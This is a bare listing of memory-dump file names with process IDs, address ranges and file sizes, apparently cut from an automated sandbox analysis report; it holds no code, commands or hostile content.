memory/4468-120-0x0000000000000000-mapping.dmp
-
memory/4468-124-0x0000000000030000-0x0000000000039000-memory.dmpFilesize
36KB
-
memory/4468-125-0x0000000000400000-0x000000000046D000-memory.dmpFilesize
436KB
-
memory/4492-351-0x00007FF65C8F0000-0x00007FF65DF8A000-memory.dmpFilesize
22.6MB
-
memory/4492-350-0x00007FF65C8F0000-0x00007FF65DF8A000-memory.dmpFilesize
22.6MB
-
memory/4492-347-0x0000000000000000-mapping.dmp
-
memory/4556-191-0x0000000001170000-0x00000000011E4000-memory.dmpFilesize
464KB
-
memory/4556-192-0x0000000001100000-0x000000000116B000-memory.dmpFilesize
428KB
-
memory/4556-190-0x0000000000000000-mapping.dmp
-
memory/4728-216-0x0000000000000000-mapping.dmp
-
memory/4772-180-0x0000000002B80000-0x0000000002B81000-memory.dmpFilesize
4KB
-
memory/4772-179-0x0000000002B80000-0x0000000002B81000-memory.dmpFilesize
4KB
-
memory/4772-177-0x0000000002E79A6B-mapping.dmp
-
memory/4772-176-0x0000000002E70000-0x0000000002E85000-memory.dmpFilesize
84KB
-
memory/4780-369-0x0000000000000000-mapping.dmp
-
memory/4780-371-0x00007FF65C8F0000-0x00007FF65DF8A000-memory.dmpFilesize
22.6MB
-
memory/4780-372-0x00007FF65C8F0000-0x00007FF65DF8A000-memory.dmpFilesize
22.6MB
-
memory/4908-355-0x0000000140001C18-mapping.dmp
-
memory/5076-283-0x0000000000000000-mapping.dmp